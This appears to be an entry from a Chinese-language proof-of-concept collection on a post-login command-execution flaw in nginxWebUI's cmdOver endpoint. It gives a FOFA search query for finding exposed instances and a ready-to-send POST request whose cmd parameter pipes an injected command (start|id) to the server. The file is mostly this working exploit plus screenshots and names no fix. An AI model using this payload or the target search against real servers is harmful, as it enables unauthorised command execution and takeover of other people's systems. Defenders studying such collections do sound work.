Awesome-POC/Web应用漏洞/nginxWebUI cmdOver 后台命令执行漏洞.md

35 lines
599 B
Markdown
Raw Normal View History

# nginxWebUI cmdOver 后台命令执行漏洞
## 漏洞描述
nginxWebUI 后台存在命令执行漏洞,攻击者登录后台后可以执行任意命令获取服务器权限
## 漏洞影响
```
nginxWebUI
```
## FOFA
```
title="nginxwebui"
```
## 漏洞复现
登录页面
![image-20220628112638269](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202206281126396.png)
验证请求包
```
POST /adminPage/remote/cmdOver
remoteId=local&cmd=start|id&interval=1
```
![image-20220628112938342](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202206281129491.png)